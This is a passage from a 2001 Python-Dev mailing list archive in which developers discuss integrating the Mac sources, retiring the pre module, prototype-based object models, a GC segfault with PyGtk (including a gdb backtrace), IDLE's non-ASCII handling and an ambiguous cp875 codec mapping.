classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-) --Guido van Rossum (home page: http://www.python.org/~guido/) From jack@oratrix.nl Fri May 11 15:29:24 2001 From: jack@oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:29:24 +0200 Subject: [Python-Dev] Mac CVS repository moved to sourceforge Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl> Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suficces to build MacPython. I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear. Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From martin@loewis.home.cs.tu-berlin.de Fri May 11 15:41:33 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 11 May 2001 16:41:33 +0200 Subject: [Python-Dev] Mac hierarchy backwards Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing. It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators. */ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake@acm.org Fri May 11 15:55:33 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just search developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack@oratrix.nl Fri May 11 15:56:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v. Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g. I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in it's MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But its easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From Samuele Pedroni Fri May 11 15:56:48 2001 From: Samuele Pedroni (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi. > > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree, I often read that Smalltalk is "simple" up to metaclasses, on the other hand the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: python instance I have data slots and a parent slot __class__, python classe G have data slots and a list parent slot __bases__, then we have the python rules (not very uniforms): function from I directly => function function from I.__class__ => bound method function from C => unbound method That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller@ion-tof.com Fri May 11 16:40:10 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful? The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake@acm.org Fri May 11 17:25:54 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g@Virginia.EDU Fri May 11 17:29:30 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to got thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, Metrowerks *compiler* and IDE for the Mac does include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there. -- Steve Majewski From guido@digicool.com Fri May 11 19:47:38 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were focred to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the mean time (weren't those related to the backtracking implementation)? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Fri May 11 21:41:30 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget get using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention which it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know: 1. Disabling gc gets rid of the segfault 2. I only see the problem with importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault. 3. If I first import the gtk module, then import my module, I get no segfault. 4. Most changes I make to the module causing the problem cause the problemm to disappear. All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem. Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at ../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from /lib/libc.so.6 From guido@digicool.com Fri May 11 22:49:00 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I > run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis@informatik.hu-berlin.de Fri May 11 21:53:55 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s=3D'=E4=F6' UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik@pythonware.com Fri May 11 23:18:27 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in october, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch until then... Cheers /F From fredrik@effbot.org Sat May 12 00:03:10 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them! Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ... (no, it's not Bill) Cheers /F From fredrik@effbot.org Sat May 12 00:14:47 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g@Virginia.EDU Sat May 12 03:43:31 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. Prototype semantics basicalaly subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that SmallTalk is sort of a subset of Self.] But you can also have finer grain classification and you can have object inheritance. ( This is handly in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linear filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none available create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it more concrete and less abstract than a class based system. Prototypes can also solve some of the sort of problems that Jim Fultons acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure a useful way to use it under the covers, it's not really a topic for python-dev. > The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one@email.msn.com Sat May 12 12:28:27 2001 From: tim_one@email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows , so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliablly. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido@digicool.com Sat May 12 13:28:23 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based language have the equivalence of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one@email.msn.com Sat May 12 13:16:33 2001 From: tim_one@email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language. In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object. A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might think", but not all the way. From fredrik@pythonware.com Sat May 12 13:25:43 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) Cheers /F From nas@python.ca Sat May 12 15:28:54 2001 From: nas@python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable skip@pobox.com wrote: >=20 > Has anyone investigated interactions between ExtensionClass objects and G= C? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. Do any of the PyGtk objects define the GC type flag? The GC is fairly good a exposing memory management bugs that otherwise go unnoticed. If you're using glib you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using electric fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine 